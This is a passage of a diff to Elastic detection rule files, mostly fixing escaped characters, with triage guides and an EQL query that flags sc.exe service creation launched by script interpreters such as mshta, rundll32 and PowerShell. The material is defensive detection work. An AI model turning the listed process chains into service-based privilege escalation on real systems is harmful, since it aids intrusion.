cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -143,7 +143,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_102.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_102.json index 11ea184e31f..506b60d9fdf 100644 --- a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_102.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_103.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_103.json index 78f983e8101..e27a5043872 100644 --- a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_103.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_104.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_104.json index 2c47c0a4ce3..e411849fd61 100644 --- a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_104.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_105.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_105.json index b225db3deff..57df2ab8c3f 100644 --- a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_105.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_106.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_106.json index f357c876bb2..e2144f77136 100644 --- a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_106.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_2.json b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_2.json index 4a76849b2e5..0aab2c92df9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_2.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_3.json b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_3.json index 2ba898e495e..3771dd83736 100644 --- a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_3.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_4.json b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_4.json index 427de916f4d..72f249c0b35 100644 --- a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_4.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_1.json b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_1.json index 772be774c50..c19dafb4538 100644 --- a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_1.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_103.json b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_103.json index 9f78bc34c95..9ed7ba78804 100644 --- a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_103.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_104.json b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_104.json index 6f271c9a1cc..75b6b32263f 100644 --- a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_104.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_2.json b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_2.json index 0385dc992ef..0eacd40cd1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_2.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_102.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_102.json index 0a4411204f4..23eae72b6e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_103.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_103.json index ffad6614c58..11d34baa860 100644 --- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_103.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_104.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_104.json index f1addcea68f..692e7a267bf 100644 --- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_104.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_105.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_105.json index 1c453f01dd9..da55f2035f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_105.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -68,7 +68,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_106.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_106.json index 0c939251df3..347a0df9f16 100644 --- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_106.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -68,7 +68,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_207.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_207.json index c91c51223bb..9e6d6556b66 100644 --- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_207.json +++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_207.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -68,7 +68,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_102.json b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_102.json index 2a0fe1c063a..71ea1033cc2 100644 --- a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_103.json b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_103.json index 8611ee7e5dc..ee7853add46 100644 --- a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_103.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_104.json b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_104.json index bdba96e4ade..4a187c922c5 100644 --- a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_104.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_205.json b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_205.json index 58d16cd62da..d00a5057956 100644 --- a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_205.json +++ b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_205.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_1.json b/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_1.json index c0b04583f6f..c690b7011a3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_104.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_104.json index 0f0dd9f6e20..639aed4f4b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Executable File Creation by a System Critical Process", - "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in 